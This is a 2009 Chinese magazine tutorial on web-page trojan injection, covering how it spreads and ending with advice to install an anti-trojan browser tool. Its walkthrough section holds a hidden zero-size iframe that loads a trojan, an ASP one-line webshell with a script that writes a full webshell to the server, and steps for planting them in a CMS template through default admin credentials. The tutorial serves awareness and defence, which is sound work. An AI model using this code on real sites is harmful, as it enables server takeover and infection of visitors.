真假

来源 :电脑知识与技术·经验技巧 | 被引量 : 0次 | 上传用户:shena011
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
   什么是网页挂马
  
  要了解网页挂马,可以先从我们身边的实际遇到的情况入手:不少用户都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码,这就是典型的网页挂马现象。
  但很多朋友会疑惑:自己打开的明明是正规网站,没有哪家正规网站会将病毒放在自己的网页上吧?怎么也会遭遇网页挂马呢?那么是什么原因导致了这种现象的发生呢?其中最有可能的一个原因就是:这个网站被其他黑客或者不法分子挂马了。
  网页挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站的主页中,利用被黑网站的流量将自己的网页木马传播开去,以达到自己不可告人的目的。例如很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让这些普通上网用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
  
   网页挂马常用手段
  
  了解了什么是网页挂马,那么网页挂马是如何实现的呢?黑客常使用哪些手段挂马呢?下面为大家逐一分析。
  1.利用各种漏洞
  新奇指数:★★★★
  中招指数:★★★★
  由于目前流行的各种热门网站、客户端软件和浏览器,都存在着众多漏洞和安全薄弱点,使得用户遭到攻击的渠道暴增;而且,随着黑客-病毒产业链臻于完善,支撑互联网发展的多种商业模式都遭到了盗号木马、木马点击器的侵袭,使得用户对于网络购物、网络支付、网游产业的安全信心遭到打击。
  现在的木马病毒绝大多数通过漏洞传播,而且多数木马病毒运行时没有明显的异常特征,用户很难及时发现自己已经中毒。
  只要用户电脑上的漏洞存在,访问挂马网站中毒的风险就一直存在。即使安装了杀毒软件,也只能在病毒入侵时拦截,风险比弥补漏洞之后会高许多倍。
  2.针对合法网站挂马
  新奇指数:★★★
  中招指数:★★★★★
  门户网站、Web2.0以及搜索类网站代表了当前网站的典型形式,同时也成为黑客们关注的焦点。借助这些网站庞大的数据库、良好的信誉和对Web2.0应用的有力支持,这些网站拥有高可信赖度和良好的信誉,为那些恶意程序的制造者创造了大量的机会。传统上,网民们有如下错误观念:只有不良网站才会带毒、才会被挂马,只要坚持良好的浏览习惯,就可以躲避盗号木马的侵袭。统计数据表明,这样的观念已经过时,那些所谓的“正常网站、大中型网站”正在整个木马链条中发挥着越来越重要的作用。
  瑞星公司的抽样统计显示,每天约有30%的网民上网时会遇到挂马网站。这些挂马网站中80%以上属于管理不严的正规网站,其中包括新闻网站、网络论坛、博客网站等。多个主流门户网站首页悬挂的广告中被植入木马病毒,用户访问这些网站就会中毒。显而易见,越来越多的恶意攻击源自合法可信赖的网站。
  3.利用“肉鸡”牟利
  新奇指数:★★★
  中招指数:★★★★★
  黑客利用“肉鸡”一般有以下几种方式:
  (1)黑客一旦控制了“肉鸡”,就可以很方便地从该电脑中盗取用户的隐私信息。如网银、网游、聊天工具等软件的账号密码,以及私人文档、照片等;
  (2)控制摄像头进行偷拍。很多游戏玩家和下载狂人的电脑经常是24小时开机,如果摄像头没有拔掉,就会被黑客偷拍,进行网上公布、甚至敲诈勒索;
  (3)帮助某些流氓厂商提高安装量或点击率。黑客可以在“肉鸡”中安装大量的插件或流氓软件,疯狂点击或弹出广告,从广告主那里收获广告费;
  (4)将“肉鸡”直接出卖给从事盗号或其他非法目的的人;
  (5)黑客控制了一定数量的“肉鸡”,同时自动刷新访问某个网站,提升该网站的访问量、造成网站瘫痪(DDos攻击),或者使某个网站服务器、防火墙瘫痪,国内很多游戏厂家曾经就受到过这种攻击,并被勒索。
  
   网页挂马技术解析
  
  要深入了解网页挂马,则需要先知道网页设计技术的分类。网站设计可以分为两大类,即:静态网页和动态网页。目前,网页挂马技术显得多样化,无论是静态网页还是动态网页都可以挂马。
  所谓“静态网页”,是指用HTML(HyperText Markup Language,超文本标记语言)语言编写的文档等,这些网页在所有网民的IE浏览器中显示的内容都是一样的。用HTML编写的超文本文件称为HTML文件,后缀名为.htm或.html。HTML文件其实就是在文本文件(后缀名为.txt)的基础上,通过添加一系列的标识符号将其描述成网页文件,如图1所示。
  比方说,“中国人的笔耕生活”的“”标识,其作用就是把“中国人的笔耕生活”这行文字在网民的浏览器标题栏上显示出来。网页挂马就是利用了网页中这样或是那样的标识实现的。 <br>  动态网页是指使用ASP、ASP.net、JSP、PHP、PERL、CFML等语言编写的Web文档,其中,最常使用的语言有ASP、ASP.net和PHP。当静态网页中有了JAVAScript和VBScript语言编写的脚本后,客户端在打开网页时,将会执行这些脚本语言,进而实现很多动态的页面效果,如动态显示时间、文本等。动态网页技术不仅可以为服务器、客户端和网站之间提供极好的互动功能,还可以充分发挥出网站数据库的效能——用户可以籍此对网站的内容进行全面的管理。如果充分利用FSO技术的话,则可以“升级”到能够对服务器进行数据管理,也正因为如此,才会涌现出大量的ASP木马,如图2所示。 <br>  网页挂马就是内嵌在静态或动态网页里的恶意代码,通过这个恶意代码可以将来访网民的浏览器访问网址转向到木马程序或恶意网址。相对于静态网页需要对每个网页进行挂马处理的麻烦,在动态网页中挂马成了黑客的最爱——由于动态网页都是通过事先设置好的模板自动、动态生成。所以,只要动态网页“模板”被黑客控制,那么整个网站就会自动、不断地出现木马,如图3所示。 <br>  举个例子,在数据库中有10篇文章。在动态网站中不会对这10篇文章制作10个网页,因为这样做实在太浪费空间和人力资源了。动态网页会这样做:先设计好一个网页显示模板,文章的标题放在哪里、内容放在哪里……都事先固定好。来访网民在文章列表页面无论单击哪篇文章,都会向网页显示模板传递一个ID参数,这个参数通常与文章在数据库里的“自动编号”字段相对应,以便准确识别要浏览的文章,如图4所示。 <br>  根据每次接收到的ID参数的值,网页显示模板会动态地调出并显示相应的文章内容。这样,看似网站有很多文章网页,实际上用于显示文章的网页只有一个,即模板。因此,只要在模板页面中添加网页木马调用语句,就能实现“全部”动态生成的网页都具有木马的目的。 <br>  如果网站是自己设计的,那么清除网马是很容易的,直接分析模板文件的代码并删除木马代码即可。如果是使用别人设计的网站,那么,很多站长都会束手无策——因为他对网站的结构一无所知。 <br>  如果网站被黑客挂马,那么通常会产生如下危害:网页显示的速度受影响。网站可能遭遇网民拒绝。网站可能被谷歌等加入黑名单。很多读者们都在谷歌中搜索内容时,看到搜索结果列表中有如图5所示的提示。 <br>   服务器可能会受到影响。网站数据库可能遭遇严重的损失。网站可能存在大量的木马程序、色情内容链接等非法内容,而遭到空间商的封杀。网站挂马影响最大其实是网站站长,有的网站甚至会因此一撅不振。其次,来访网民也会受到一定的影响。如果是安装杀毒软件的话还好一点儿——通常会给出相应的拦截报告,如图6所示。 <br>   如果没有安装杀毒软件的话,IE浏览器一般会僵死几秒后就会恢复“正常”,实际上,此时系统已经中招。中招的迹象一般表现在如下几个方面: <br>  系统变慢;打开IE后自动访问木马指定的网站;.exe或其他指定扩展名的文件全部被感染;.gho之类的重要文件全部被删除密码被窃取;每隔一段时间弹出一个网页窗口;出现大量莫名其妙的文件…… <br>   <br>   网页挂马实战演练 <br>   <br>  网页是如何被黑客挂上木马的?网马都是怎样炼成的?它是如何激活的?无数的问题都在困扰着初次接触网马的新手们。下面,就让我们通过两个实例,为读者们揭开网马的神秘面纱! <br>  1.静态网页挂马术 <br>  静态网页有两种,一种是站长针对某些内容,手工创建出来的独立静态网页;另一种是在动态网站的后台添加文章等内容时,通过单击“生成静态html页面”按钮,自动生成的静态网页,也就是通过事先创建的模板衍生出来的网页。要在前者的静态网页中挂马,需要在每一个静态网页中添加恶意代码;要在后者的静态网页中挂马,只需要在事先创建的模板中添加恶意代码即可。 <br>  在静态网页中挂马,一般是使用“<iframe>”标记来实现,此标记用于插入浮动框架。所谓“浮动框架”,是指可以做为一个页面元素添加到普通页面的框架,由于这样的框架可以位于页面的各个位置,所以称为“浮动框架”。如果只使用“<iframe>”标记,则框架中不会显示任何内容,所以,我们需要通过配合如表1所示的标记属性进行内容的添加。 <br>   <br>  属性 具体含义 <br>  SRC 浮动框架中的页面源地址 <br>  WIDTH 在框架页面中显示的宽度 <br>  HEIGHT 在框架页面中显示的高度 <br>  ALIGN 对齐方式,左对齐、居中或右对齐 <br>  NAME 设定框架的名称 <br>  MARGINWIDTH 框架边缘宽度 <br>  MARGINHEIGHT 框架边缘高度 <br>  SCROLLING 设定框架是否使用滚动条 <br>  FRAMEBORDER 设定框的边框 <br>   <br>  使用“<iframe>”标记挂马时,使用的语句格式如下: <br>  <iframe src=http://网页木马地址width=0 height=0></iframe> <br>  由于Width和Height属性均为“0”,所以框架将处于不可见状态,如图7所示。 <br>  在上述“muma.html”网页中,我们使用“<iframe>”标记加载了“http://192.168.1.65/happy3.htm”这个页面,这个页面将会调用木马程序。它的制作过程如下: <br>  第一步,运行“超强组合网马.exe”程序,在打开的如图8所示界面中,在第三个地址栏里输入木马程序的路径。 <br>  第二步,单击右侧的“3.制作”按钮,如果弹出如图9所示的提示框,则表示网页木马文件已经生成,即名为“happy3.htm”的文件。 <br>  第三步,将“happy3.htm”文件复制到“muma.html”网页同级目录下,这样就完成了正常网页与网马网页之间的关联。 <br>  第四步,将“happy3.htm”中指定的木马程序“Server.exe”(这里使用的是冰河工具内置的服务器端文件),复制到指定的路径中,如图10所示。 <br>   在完成上述三个文件之间的关联后,有必要对当前测试环境加以说明,以便帮助读者们理解本文: <br>  A机:安装了IIS,IP地址为192.168.1.65,IIS默认网站对应的目录为“C:\Inetpub\wwwroot”。Muma.html、happy3.htm、server.exe三个文件都位于此目录中。 <br>  B机:没有安装IIS,安装了卡巴斯基2010。 <br>  在B计算机中打开IE浏览器,输入“http://192.168.1.65/muma.html”,随即卡巴斯基就会报警,告诉我们IE浏览器加载的对象“happy3.htm”文件包含了木马程序,如图11所示。 <br>  显然,网马制作过程是成功的,因为已经“顺利”地在来访网民计算机中进行病毒传播了。对于这样的简易型网马,防范非常简单——只需安装杀毒软件即可。在杀毒软件成功拦截网马文件后,建议读者们即时查看当前网页的源文件,对其中的挂马技术进行分析,如图12所示。 <br>   只要在源代码中搜索“Iframe”这个关键字,就很容易找到网页木马的源头。查找对话框可以使用“Ctrl+F”键调出。 <br>   <br>  通常,静态网页的内容可以完整地阅读,而动态网页的源代码中,<% %>部分的内容将呈不可阅读状态。 <br>   <br>  2.动态网页模板挂马 <br>  在前面的内容中已经讲过,如果网站被挂马了,那么服务器也有可能会受到影响。在下面的内容中,将讲解怎样通过网站挂马,对服务器进行远程控制。本例使用的木马程序分为服务端和客户端: <br>  这里的“服务端”,是指插入到asp文件中的语句,该语句将会接收入侵者通过客户端提交的数据,服务端的代码内容为:<%execute request("value")%>,其中value可以自己修改。这样的木马服务端可以说是非常安全,因为没有杀毒软件会把这条语句当成病毒或黑客工具什么的,因此检测起来很难! <br>  这里的“客户端”,是指一个网页文件(名为“木马客户端.htm”),它用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的服务器远程控制文件。 <br>  本例使用的客户端默认源代码如下(//及右侧内容为本例说明内容): <br>  <form action=http://192.168.0.65/mm.asp method=post> <br>  // action=后面的网址是含有木马服务端的网页文件 <br>  <textarea name=value cols=120 rows=10 width=45> <br>  set lP=server.createObject("Adodb.Stream") <br>  //必须建立对象,才可以使用它固有的属性和方法,理解这一点需要有ASP编程知识。 <br>  lP.Open //打开 <br>  lP.Type=2 //以文本方式 <br>  lP.CharSet="gb2312" //字体标准 <br>  lP.writetext request("xhx") //取得木马内容,参数xhx可以自己定义。 <br>  lP.SaveToFile server.mappath("wei.asp"),2 <br>  //将木马内容以覆盖的方式写入wei.asp文件。 <br>  lP.Close //关闭对象 <br>  set lP=nothing //释放对象 <br>  response.redirect "wei.asp" <br>  //处理完成后跳转到生成的木马登录页面wei.asp。 <br>  </textarea> <br>  <textarea name=xhx cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br> <br>  <input type=submit value=提交> <br>  这个客户端文件的功能是,利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个<textarea></textarea>中的内容,创建wei.asp这个网页文件,并将第二个文本框中添加的木马内容写入wei.asp,这样就相当于在服务器上建立了所需要的远程控制文件,进而就能对服务器进行管理。 <br>  接着,来说一下测试环境: <br>   A机:安装了IIS,IP地址为192.168.0.65,IIS默认网站对应的目录为“C:\Inetpub\wwwroot”。 <br>  B机:没有安装IIS。 <br>  测试网站系统:“贫龙”系统 <br>  ASP木马文件:lanker2 免杀ASP木马.asp <br>  在知道了上述的木马技术原理,以及做好上述准备工作后,需要依次执行如下操作: <br>  第一步,将“贫龙”系统解压并复制到“C:\Inetpub\wwwroot”目录后,访问网站根目录下的Login.asp文件,将会出现如图13所示的登录页面。 <br>  第二步,先使用默认管理员用户名和密码(均为admin)登录,在如图14所示的页面中单击上方的“新闻模板管理”。 <br>  第三步,在切换到如图15所示的页面时,单击“修改”链接。 <br>  第四步,在切换到的如图16所示页面中,将“<%execute request("value")%>”这句代码输入到最下方。 <br>  第五步,单击“修改”按钮返回上一步后,单击“增加新闻文章”链接进入如图17所示的页面。随便输入一些文章标题和内容文字后,单击下方的“添加”按钮完成此文章的添加。这里需要注意的地方有两点,一是文章的分类是“公司荣誉”,这个分类告诉了我们在哪儿找新增的文章。二是新闻使用的模板是“默认模板”,这表示已经把前面添加的木马服务端添加到这篇文章中了。 <br>  第六步,在出现如图18所示的页面时,把文件名(即2009215160014.asp)复制下来,这表示含有木马服务端的文件名是什么。 <br>  第七步,打开一个IE浏览器窗口并访问“http://192.168.0.65”,找到并单击刚添加的文章,在打开的页面中把文章访问URL地址复制下来,即“http://192.168.0.65/gsry/2009215160014.asp”,如图19所示。 <br>   第八步,使用记事本程序打开木马的客户端文件“木马客户端.htm”,将“<form action= method=post>”这一句中的网址,使用上一步复制的网址替换掉并保存文件,如图20所示。 <br>  第九步,再使用“记事本”程序打开ASP木马网页文件“lanker2 免杀ASP木马.asp”,将其中的内容复制下来,如图21所示。这里要注意此木马的登录密码为数字1,这个密码将会在下面的应用输入。 <br>  第十步,使用IE浏览器运行客户端文件,并将复制的木马内容粘贴到下方的文本框中,如图22所示。 <br>   第十一步,单击“提交”按钮后,在被入侵网站中将生成wei.asp这个文件,其内容就是上一步复制的ASP木马文件内容。因此,在自动运行此文件后,将会出现ASP木马的控制页面,如图23所示。 <br>  第十二步,在“密码”栏输入ASP木马指定的密码并单击“登录”按钮,随即,就可以看到服务器的内容了,如图24所示。 <br>   此时,黑客就可以使用此ASP木马对服务器进行管理了,比方说对“C:\Inetpub\wwwroot”目录进行一些破坏操作,等等。 <br>   <br>   使用“金山网盾”防范挂马网页 <br>   <br>  看了以上这些挂马手段和网页挂马的危害,是不是有点不敢上网了呢?其实,对普通网民来说,也不用太害怕,建议大家使用“金山网盾”来识别挂马网页。 <br>  金山网盾是金山公司在原清理专家网页防挂马功能的基础上,整合了针对常见浏览器的挂马攻击的一款防护工具,是一款独立的web防护产品。金山网盾支持最新的IE0day漏洞和第三方软件漏洞等的挂马防护,支持支持多款IE内核的浏览器和应用程序,兼容Firefox火狐浏览器、Opera、谷歌Chome浏览器等非IE内核浏览器,也广泛适用与当前的主流操作系统。 <br>  金山网盾体积小巧,而且安装和使用也非常简单。安装完毕后,在桌面、快速启动中都看不到任何图标,只是在“程序”中可看到金山网盾,但仍然没有运行选项。事实上,金山网盾已经在运行了。运行浏览器,你会发现,浏览器边缘有绿色的边框一闪一闪的,然后消失,这表示金山网盾的防护功能开始起作用了。如图25所示。 <br>  接下来我们访问网站,看看金山网盾的保护效果如何。首先访问正常的网站,你会发现没有任何提示,与没有安装金山网盾完全一样。是不是金山网盾没有效果呢?这里再输入恶意网站进行测试,如果这个网站存在风险的话,浏览器会有一闪一闪的红色边框出现然后消失,与此同时,浏览器右下角会弹出警告窗口,金山网盾自动断开该链接,并进行阻止。如图26所示。 <br>  如果大家找不到恶意网站来测试,不妨进入瑞星网站监测网(http://mwm.rising.com.cn/)来查看最近的恶意网站排行榜,选取恶意网站榜单上的网站进行测试。不过根据笔者的经验,最好不要选择排行榜前几名的,因为瑞星发布的恶意网站的前几名已经被屏蔽不能访问了,而选择相对靠后的恶意网站,金山网盾则很快可以识别出恶意网页来。 <br>  除了支持IE浏览器,在傲游浏览器中,金山网盾也可以很好地拦截并屏蔽恶意网站。金山网盾的功能比较单一,就是识别恶意网页,其操作也简单,安装完后,几乎不需要大家做任何设置即可拦截恶意网页。如图27所示。 <br>  同类的防范工具还有“365门神”、“上网无忧电子眼”等,具体操作也不难,用户很容易轻松上手,这里不再详细介绍。 <br>   <br>   结语: <br>   <br>  本专题为大家介绍了网页挂马的危害、常用手段、技术分析、防范方法等,并用具体的操作实例为大家讲解了网页挂马是如何实现的。通过具体的攻防实例,让用户可以更深刻地了解网页挂马,从而做好相应的安全防范工作。除了本文推荐的几款防挂马软件外,一款全功能的杀毒软件也是非常必要的。 <br> </div> </section> <!-- 其他文献块 --> <section class="article-other"> <div class="article-other-header" style="color:#2162e4"><span>其他文献</span></div> <div class="article-other-content"> <div class="tit"><a href="/periodical/f3bb501e33b8aa2ab869f9abd61cc5a2.html" target="_blank" title="修复Excel文件的简单方法"> 修复Excel文件的简单方法 </a></div> <div class="con"> 在使用Excel工作簿工作学习过程中,你有没有碰到Excel文件损坏的情况?病毒、存储故障、断电等原因都会造成Excel文件损坏,使得Excel工作簿文件不能正常编辑、打印,甚至是无法打开。下面是我整理的几种方法和大家一起交流分享!  1、转换格式法  一般情况下,当你可以打开受损Excel文件,只是不能对文件进行正常编辑和打印操作的时候,那么建议你首先尝试这种方法:将受损的Excel工作簿重新保 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/9aabeeaa75c833b7003e4ee22421d3e9.html" target="_blank" title="word 2010也玩“扣图”"> word 2010也玩“扣图” </a></div> <div class="con"> 在用Word进行文档编辑的时候,为了使得文档图文并茂,经常需要插入一些图片,但是在插入图片的时候,仅仅需要插入这张图片中的某个主体部分,而不需要背景,遇到这种情况通常都是先转到Photoshop中,将需要的图片主体部分“扣”出来,然后再重新插入,相对来说步骤比较多,其实如果你使用Word2010就无需这么麻烦了,可以一步到位完成扣图。  运行Word2010后在需要插入图片的地方,切换到“插入”选 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/9b7eaf8923c75d048f9f0816e7651d8d.html" target="_blank" title="WORD2010中插入分数三法"> WORD2010中插入分数三法 </a></div> <div class="con"> 做为一名小学数学老师,经常要制作试卷,特别试题中有一些分数需要输入,经过对WORD2010多方试验,发现可以使用多种方法来输入需要的分数和,现归纳出来,与同仁们共享。    方法1:插入对象法    定位到需要输入分数的位置,切换到“插入”选项卡,单击“对象”按钮,弹出“对象”窗口后,选中“对象类型”下的“Microsoft公式3.0”,单击“确定”按钮(如图1)。  弹出“公式”工具栏(调用类似 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/2393fea973d15ab636880986fd7c8746.html" target="_blank" title="一路风雨一路歌"> 一路风雨一路歌 </a></div> <div class="con"> 2009年9月,《神鬼传奇》新篇“成神之路”华丽开启。  “成神之路”这个名词对《神鬼传奇》的玩家来说并不陌生。在《神鬼传奇》背景故事中,世界各地探险者勇敢的向邪恶之神挑战并最终走上问鼎神邸的道路,这就是“成神之路”的由来。  在这成神路上,为了最大体现游戏背景中的艰难挑战,无论是PVE,还是PVP战场内容,在“成神之路”中都得到了前所未有的加强。战斗之余,一些温馨浪漫的元素不失时宜的加入“成神之 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/912ec9194b1073e5269eb46ccf6e8bf7.html" target="_blank" title="安抚五大策略,解决网络共享小问题"> 安抚五大策略,解决网络共享小问题 </a></div> <div class="con"> 为了充分提升工作效率,处于局域网工作环境中的员工,总喜欢通过网络共享方式与同事进行交流。不过,在与同事交流的过程中,我们会不可避免地遇到一些网络共享问题,这些共享问题如果不能被快速排除,显然会影响工作效率。其实,很多网络共享小问题,都是由于系统中的一些设置被无意中修改造成的,此时我们只要巧妙“安抚”系统组策略,就能轻松化解这些工作中的“拦路虎”了。    1、解决匿名账号权限问题    当我们尝试 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/ea8b67850a565d26de947c84be27fe5d.html" target="_blank" title="在Word中让环绕方式“出出格”"> 在Word中让环绕方式“出出格” </a></div> <div class="con"> 我们都知道Word中的文字环绕方式相当丰富,有上下型环绕、四周型环绕、紧密型环绕和衬于文字下方……等。其实我们还可以让环绕方式“出出格”,不信跟我一起试一下。  1、在Word 2003中插入图片后单击图片会打开“图片编辑小窗口”,然后单击“图片编辑”窗口中的“文字环绕”图标→编辑环绕顶点,这时图片会被红色虚线和四角上的小黑块控制点圈上,把鼠标指针指向红线或四角的小黑块控制点后按住左键拖动就能让文 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/ac9a890bb4233b48741953f3874a42ac.html" target="_blank" title="学生装机"> 学生装机 </a></div> <div class="con"> 为了节省资金,很多学生依然选择DIY电脑,可装机店总是从中榨取利润,像机箱、电源、这种不起眼的设备,一不小心就被装机店“忽悠”了,特别是电源,由于用户抱着“能用就行”的态度,这给JS有机可趁,他们会为了赚钱微薄利润,而给你装上一个山寨电源,而这样带来的后果不言而喻,为此告诫大家,装机时切记别忽视了电源。    一、典型案例:贪图山寨的后果    年后开学时,不少商家为了吸引学生购机,都开始打出促销 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/5c02762536657569ed63fc3b10e78b23.html" target="_blank" title="教你如果将博客文章推荐给QQ好友"> 教你如果将博客文章推荐给QQ好友 </a></div> <div class="con"> 笔者经常会登录QQ邮箱,在"阅读空间"中阅读好友最新的博客文章,其实你知道吗?在阅读空间中阅读文章的时候,自己还可以将你读到的文章推荐给好友一起来分享,利用QQ邮箱中目前正在内测的"推荐"功能便能轻松搞定。    一、推荐文章    步骤01,登录自己的QQ邮箱,进入到"阅读空间"页面,如果想将自己正在阅读的一篇博客文章推荐给好友,可以单击该篇文章标题下的"我要推荐"超链接(如图1);  步骤02 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/2f09bea9600163f03ae1d7993663a49b.html" target="_blank" title="记载影像"> 记载影像 </a></div> <div class="con"> 数码相机、拍照手机的普及,似乎让我们感觉到了数码生活的乐趣,每当去出游、散步时,都喜欢拍一张张温馨、浪漫的照片,记录着曾经的相伴和牵挂,为了将照片成为历久弥新的珍藏,必须将它们“冲洗”出来,而选择喷墨打印,成为家庭生活的最佳途径。    一、为啥选择照片喷打?    在影像输出领域,喷墨打印似乎早早就研究透了消费者心里,但对于消费者来说,他们不仅要追求产品性价比,同时对打印成本也很精打细算,为了满 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> <div class="article-other-content"> <div class="tit"><a href="/periodical/79780aa0d9a4e170cb8cd1eeacf1d25d.html" target="_blank" title="口袋DC"> 口袋DC </a></div> <div class="con"> 每年的4月,这是大自然万物复苏的季节,花蕾绽放、绿叶葱葱、蝴蝶翩翩起舞,我们情不自禁想记录这一瞬间,因而在这个时候,不少学生、MM都开始去买一部DC,而为了便于携带、展现时尚个性,卡片DC成了市场新宠。     一、卡片机应用现状    随着用户对时尚需求的提升,数码相机的外形越来越漂亮,机身也越来越轻薄,从2007年~2009那年,卡片DC得到了广泛普及,几乎所有的品牌都推出了卡片DC,其价格从 </div> <div class="typ"> <div class="typ-nam"> <span>期刊</span> </div> <div class="typ-con"> </div> </div> </div> </section> </div> </div> <!-- 右侧边栏 --> <div class="col-lg-3 col-md-3 hidden-sm hidden-xs"> <div class="content-right"> <div class="sid"> <div class="tit"> <h3>与本文相关的学术论文</h3> </div> <div class="con3"> <ul> </ul> </div> <!-- <div class="bot"> <a href="#" target="_blank"><button class="btn btn-default btn-block">更 多</button></a> </div> --> </div> <div class="sid-img-ad"> <script src=/d/js/public/new5.js></script> </div> </div> </div> </div> </section> </main> <!-- 页面底部 --> <footer class="public-footer"> <section class="top"> <div class="container"> <div class="row"> <div class="col-xs-120 gongjujianjie">期刊论文真假发表于2009年10期电脑知识与技术·经验技巧作者博文视点,本篇论文的所有权归原作者博文视点所有,如果您对本文有版权争议,可与客服联系进行内容授权或下架。 </div> </div> </div> </section> <section class="bottom"> <div class="container friend-link"> <div class="row"> <div class="col-xs-12"> <span class="title">友情链接:</span> <a href="https://www.soolun.com/" target="_blank">搜论网</a> <a href="https://www.soolun.com/" target="_blank">论文下载</a> </div> </div> </div> <div class="container service-link"> <div class="row"> <div class="col-lg-9 col-md-9 col-sm-12 col-xs-12"> <div class="aboutus"> <a href="/about.html">关于我们</a> <a href="/about.html">联系我们</a> <a href="/about.html">广告服务</a> <a href="/about.html">版权声明</a> <a href="/about.html">新手指南</a> <a href="/about.html">网站地图</a> </div> <div class="kefuqq"> 客服qq:184688754 客服qq:184688754 </div> <div class="disclaimer"> <span>声明:本文档内容版权归属内容提供方,如果您对本文有版权争议,可与客服联系进行内容授权或下架</span><span>搜论网</span> © CopyRight 2018-2024 </div> </div> <div class="col-lg-3 col-md-3 col-sm-12 col-xs-12 wechat"> <div class="wechat-item"> <img src="/image/weixin.png" alt="微信客服" > <div class="img-name">微信客服</div> </div> <div class="wechat-item"> <img src="/image/weixin.png" alt="微信服务号"> <div class="img-name">微信服务号</div> </div> </div> </div> </div> </section> </footer> <script src="//cdn.bootcdn.net/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="//cdn.bootcdn.net/ajax/libs/twitter-bootstrap/3.4.1/js/bootstrap.min.js"></script> <script src="//cdn.bootcdn.net/ajax/libs/bootstrap-hover-dropdown/2.2.1/bootstrap-hover-dropdown.min.js"></script> <script src="//cdn.bootcdn.net/ajax/libs/bootstrap-select/1.13.14/js/bootstrap-select.min.js"></script> <script src="/js/js.js?v=1.0"></script> </body> </html>